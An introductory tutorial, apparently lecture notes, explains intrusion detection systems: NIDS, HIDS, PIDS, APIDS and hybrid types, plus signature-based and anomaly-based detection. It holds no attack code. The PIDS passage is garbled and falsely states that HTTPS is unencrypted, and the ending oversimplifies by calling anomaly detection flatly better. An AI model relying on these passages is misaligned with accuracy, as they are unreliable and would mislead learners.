An Intrusion Detection System (IDS) is a monitoring system that detects

suspicious activities and generates alerts when they are detected

A system called an intrusion detection system (IDS) observes network
traffic for malicious transactions and sends immediate alerts when it is
observed. It is software that checks a network or system for malicious
activities or policy violations. Each illegal activity or violation is often
recorded either centrally using a SIEM system or notified to an
administration. IDS monitors a network or system for malicious
activity and protects a computer network from unauthorized access
from users, including perhaps insiders.

How does an IDS work?

 An IDS (Intrusion Detection System) monitors the traffic on a computer

network to detect any suspicious activity.
 It analyzes the data flowing through the network to look for patterns and
signs of abnormal behavior.
 The IDS compares the network activity to a set of predefined rules and
patterns to identify any activity that might indicate an attack or intrusion.
 If the IDS detects something that matches one of these rules or patterns, it
sends an alert to the system administrator.
 The system administrator can then investigate the alert and take action to
prevent any damage or further intrusion.

Classification of Intrusion Detection System

IDS are classified into 5 types:

 Network Intrusion Detection System (NIDS): Network intrusion detection
systems (NIDS) are set up at a planned point within the
network to examine traffic from all devices on the
network. It performs an observation of passing traffic on the entire subnet
and matches the traffic that is passed on the subnets to the collection of
known attacks. Once an attack is identified or abnormal behavior is
observed, the alert can be sent to the administrator. An example of a NIDS is
 installing it on the subnet where firewalls are located in order to see if
someone is trying to crack the firewall.

 Host Intrusion Detection System (HIDS): Host intrusion detection systems

(HIDS) run on independent hosts or devices on the network. A HIDS
monitors the incoming and outgoing packets from the device only and will
alert the administrator if suspicious or malicious activity is detected. It takes
a snapshot of existing system files and compares it with the previous
snapshot. If the analytical system files were edited or deleted, an alert is
sent to the administrator to investigate. An example of HIDS usage can be
seen on mission-critical machines, which are not expected to change their
layout.
 Protocol-based Intrusion Detection System (PIDS): Protocol-
based intrusion detection system (PIDS) comprises a system or agent
that would consistently reside at the front end of a server, controlling
and interpreting the protocol between a user/device and the server. It
is trying to secure the web server by regularly monitoring the
HTTPS protocol stream and accepting the related HTTP protocol. As
HTTPS is unencrypted and before instantly entering its web
presentation layer then this system would need to reside in this
interface, between to use the HTTPS.

 Application Protocol-based Intrusion Detection System
(APIDS): An application Protocol-based Intrusion Detection System
(APIDS) is a system or agent that generally resides within a group of
servers. It identifies the intrusions by monitoring and interpreting the
communication on application-specific protocols. For example, this
would monitor the SQL protocol explicitly to the middleware as it
transacts with the database in the web server.

 Hybrid Intrusion Detection System: Hybrid intrusion detection
system is made by the combination of two or more approaches to the
intrusion detection system. In the hybrid intrusion detection system,
the host agent or system data is combined with network information
to develop a complete view of the network system. The hybrid
intrusion detection system is more effective in comparison to the
other intrusion detection system. Prelude is an example of Hybrid
IDS.

Organizations set up a Protocol-based Intrusion Detection

System at the front end of the server. It interprets the protocols
between the server and the user. PIDS monitors the HTTPS
server regularly to secure the web. Similarly, it allows the HTTP
server which is related to the protocol

Signature-based Intrusion Detection Method

The IDS developed the Signature-based intrusion detection
method to examine the network traffic and to detect attack
patterns. For instance, it verifies the network traffic with the log
data to identify the intrusion. If this method detects any intrusion
then the IDS solution creates a signature of it and adds it to the
list. The patterns which are detected are known as sequences and
these sequences are a specific number of bytes or a set of 0’s
and 1’s in the network. However, it is easy to detect the attacks
whose patterns are existed in the system in the form of
signatures. But to detect new attacks whose signature is not yet
created is difficult.
Anomaly-based Intrusion Detection Method
As we have seen that it is difficult to detect unknown or new
malware attacks with the help of the Signature-Based Detection
method. Therefore, organizations use the anomaly-based
intrusion detection method to identify those new and unknown
suspicious attacks and policy breaching which the Signature-
based detection method cannot identify easily.
However, new intrusion techniques and malware are increasing
rapidly. This method uses Machine learning to create an activity
model. If this method detects any receiving patterns which are
not found in the model, then the method declares these patterns
as malicious patterns. In conclusion, the anomaly-based
detection system is better in comparison to the Signature-based
method.